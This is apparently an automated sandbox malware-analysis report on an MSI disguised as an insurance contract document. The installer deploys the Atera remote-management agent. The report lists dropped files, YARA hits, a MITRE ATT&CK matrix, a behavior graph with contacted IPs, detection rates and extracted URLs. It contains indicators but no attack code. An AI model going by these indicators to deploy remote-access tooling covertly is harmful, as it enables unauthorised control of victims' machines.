                                Source: Yara matchFile source: C:\Windows\Temp\~DF20796E8FF448BF6A.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFA24ABE8BCDD2C3AC.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminder.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\442ad4.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\AteraSetupLog.txt, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFB49845DCA9307884.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF9CAD11B6C8C4B523.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\442adc.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFD939BC98ADC26595.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI46E3.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFBCD2CB482E94EC88.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFF74AB66B1D2368FD.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIA999.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFA33F85AAEEE1E7D7.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI77D8.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI2E58.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSIC40B.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF0DCD01A74A1FCC87.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Config.Msi\442acf.rbs, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFBD3ED4C892EF965C.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI7BC1.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI6CA1.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DFEA59E954C7A9A6E9.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI31B4.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF5A19BC0F45D3B82A.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Temp\~DF6DE34C2C10E5C3B3.TMP, type: DROPPED
                                Source: Yara matchFile source: C:\Windows\Installer\MSI4B97.tmp, type: DROPPED
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18CB9F0 GetModuleHandleW,OutputDebugStringA,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,GetLastError,GetProcAddress,OutputDebugStringA,OutputDebugStringA,CorBindToRuntimeEx,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,_snprintf,OutputDebugStringA,37_2_00007FFDF18CB9F0

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		1
                                Replication Through Removable Media                                		541
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		21
                                Disable or Modify Tools                                		OS Credential Dumping2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		2
                                Encrypted Channel                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		22
                                Windows Service                                		1
                                Deobfuscate/Decode Files or Information                                		LSASS Memory11
                                Peripheral Device Discovery                                		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Command and Scripting Interpreter                                		22
                                Windows Service                                		111
                                Process Injection                                		31
                                Obfuscated Files or Information                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts11
                                Scheduled Task/Job                                		11
                                Scheduled Task/Job                                		11
                                Scheduled Task/Job                                		1
                                Timestomp                                		NTDS165
                                System Information Discovery                                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts11
                                Service Execution                                		Network Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets1
                                Query Registry                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                File Deletion                                		Cached Domain Credentials671
                                Security Software Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items123
                                Masquerading                                		DCSync11
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                Modify Registry                                		Proc Filesystem361
                                Virtualization/Sandbox Evasion                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt361
                                Virtualization/Sandbox Evasion                                		/etc/passwd and /etc/shadow1
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                                Rundll32                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576938 Sample: Documento_Contrato_Seguro_2... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 151 Multi AV Scanner detection for dropped file 2->151 153 Multi AV Scanner detection for submitted file 2->153 155 Yara detected AteraAgent 2->155 157 7 other signatures 2->157 8 AteraAgent.exe 2->8         started        13 msiexec.exe 173 118 2->13         started        15 AteraAgent.exe 2->15         started        17 4 other processes 2->17 process3 dnsIp4 143 108.158.75.46 AMAZON-02US United States 8->143 93 C:\...\System.Management.dll, PE32 8->93 dropped 95 C:\...95ewtonsoft.Json.dll, PE32 8->95 dropped 97 C:\...\Microsoft.Win32.TaskScheduler.dll, PE32 8->97 dropped 105 200 other malicious files 8->105 dropped 159 Installs Task Scheduler Managed Wrapper 8->159 19 AgentPackageProgramManagement.exe 8->19         started        23 AgentPackageUpgradeAgent.exe 8->23         started        36 5 other processes 8->36 99 C:\Windows\Installer\MSICBDF.tmp, PE32 13->99 dropped 101 C:\Windows\Installer\MSIA1C8.tmp, PE32 13->101 dropped 103 C:\Windows\Installer\MSI7BC1.tmp, PE32 13->103 dropped 107 59 other files (50 malicious) 13->107 dropped 25 msiexec.exe 13->25         started        27 AteraAgent.exe 13->27         started        30 msiexec.exe 13->30         started        32 msiexec.exe 13->32         started        145 13.232.67.198 AMAZON-02US United States 15->145 147 52.222.144.9 AMAZON-02US United States 15->147 109 30 other malicious files 15->109 dropped 161 Creates files in the system32 config directory 15->161 163 Reads the Security eventlog 15->163 165 Reads the System eventlog 15->165 38 7 other processes 15->38 34 conhost.exe 17->34         started        file5 signatures6 process7 dnsIp8 129 104.18.21.76 CLOUDFLARENETUS United States 19->129 75 C:\Program Files (x86)\...\shimgen.exe, PE32 19->75 dropped 87 13 other malicious files 19->87 dropped 40 conhost.exe 19->40         started        131 20.60.197.1 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->131 77 C:\...\System.ValueTuple.dll, PE32 23->77 dropped 79 C:\Program Files (x86)\...\Pubnub.dll, PE32 23->79 dropped 81 C:\...81ewtonsoft.Json.dll, PE32 23->81 dropped 89 4 other malicious files 23->89 dropped 51 2 other processes 23->51 42 rundll32.exe 15 9 25->42         started        53 4 other processes 25->53 141 2 other IPs or domains 27->141 91 2 other malicious files 27->91 dropped 167 Creates files in the system32 config directory 27->167 169 Reads the Security eventlog 27->169 171 Reads the System eventlog 27->171 46 rundll32.exe 30->46         started        49 rundll32.exe 30->49         started        55 2 other processes 32->55 133 20.50.88.232 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 36->133 135 152.199.23.209 EDGECASTUS United States 36->135 83 C:\...\TicketingTray.exe (copy), PE32 36->83 dropped 57 6 other processes 36->57 137 35.71.184.3 MERIT-AS-14US United States 38->137 139 13.227.8.14 AMAZON-02US United States 38->139 85 C:\Windows\Temp\SplashtopStreamer.exe, PE32 38->85 dropped 59 8 other processes 38->59 file9 signatures10 process11 dnsIp12 149 40.119.152.241 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 42->149 111 C:\...\AlphaControlAgentInstallation.dll, PE32 42->111 dropped 121 3 other files (none is malicious) 42->121 dropped 113 C:\...\AlphaControlAgentInstallation.dll, PE32 46->113 dropped 123 3 other files (none is malicious) 46->123 dropped 173 System process connects to network (likely due to code injection or exploit) 46->173 115 C:\...\AlphaControlAgentInstallation.dll, PE32 49->115 dropped 125 3 other files (none is malicious) 49->125 dropped 117 C:\...\AlphaControlAgentInstallation.dll, PE32 53->117 dropped 119 C:\...\AlphaControlAgentInstallation.dll, PE32 53->119 dropped 127 10 other files (1 malicious) 53->127 dropped 61 conhost.exe 55->61         started        63 net1.exe 55->63         started        65 conhost.exe 55->65         started        67 conhost.exe 57->67         started        69 cscript.exe 57->69         started        71 conhost.exe 59->71         started        73 cscript.exe 59->73         started        file13 signatures14 process15

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                Documento_Contrato_Seguro_25105476.msi24%ReversingLabsWin32.Trojan.Atera

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                442ad5.rbf (copy)26%ReversingLabsWin32.PUA.Atera
                                442ad7.rbf (copy)0%ReversingLabs
                                442ad8.rbf (copy)0%ReversingLabs
                                442ad9.rbf (copy)0%ReversingLabs
                                442ada.rbf (copy)0%ReversingLabs
                                442adb.rbf (copy)0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe26%ReversingLabsWin32.PUA.Atera
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\CommunityToolkit.WinUI.Notifications.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\StructureMap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Buffers.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                No Antivirus matches

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=cf6b40e8-5a88-4477-9cc7-4f406bdb20baAteraAgent.exe, 00000010.00000002.2498500115.000002BE8016C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/ef8472c8AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52807000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80402000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80413000.00000004.00000800.00020000.00000000.sdmpfalse
                                      http://schemas.datacontract.orgAteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B520CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          http://firessh.net/AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://community.chocolatey.org/packages/checksum.AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                              https://agent-api.atera.com/Production/Agent/thresholds/ef8472c8-8ede-4877-a4a2-21e52a229933AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                https://community.chocolatey.org/packages/ant/1.10.14AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgXAgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFEC8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFE1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://chocolatey.org/contact.AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                      https://nlog-project.org/AgentPackageMonitoring.exe, 00000025.00000002.2378384520.000001D73B958000.00000002.00000001.01000000.00000023.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpfalse
                                                        https://agent-api.atera.com/Production/Agent/track-eventrundll32.exe, 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIPAteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://community.chocolatey.org/packages/checksum)AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                              https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip?Y2EPV0xXBZAteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershellAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                  http://crl.ssc.lt/root-c/cacrl.crl0AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    http://somewhere123zzaafasd.invalidUAttemptingAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                      http://schemas.datacontract.org/2004/07/System.ServiceProcessAteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        https://my.splashtop.com/csrs/winAgentPackageSTRemote.exe, 00000023.00000000.2256494928.0000015420AA2000.00000002.00000001.01000000.0000001A.sdmpfalse
                                                                          https://docs.chocolatey.org/en-us/create/automatic-packages#automatic-updater-auAgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
                                                                            HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.ZAteraAgent.exe, 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              https://github.com/dgalbraith/chocolatey-packages/tree/master/automatic/antAgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstallerAteraAgent.exe, 00000010.00000002.2498500115.000002BE8007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52053000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://agent-api.atera.com/Production/Agent/dynamic-fields/AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://community.chocolatey.org/api/v2/XAgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3A3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C3E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://docs.nuget.org/create/Nuspec-Reference.AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpfalse
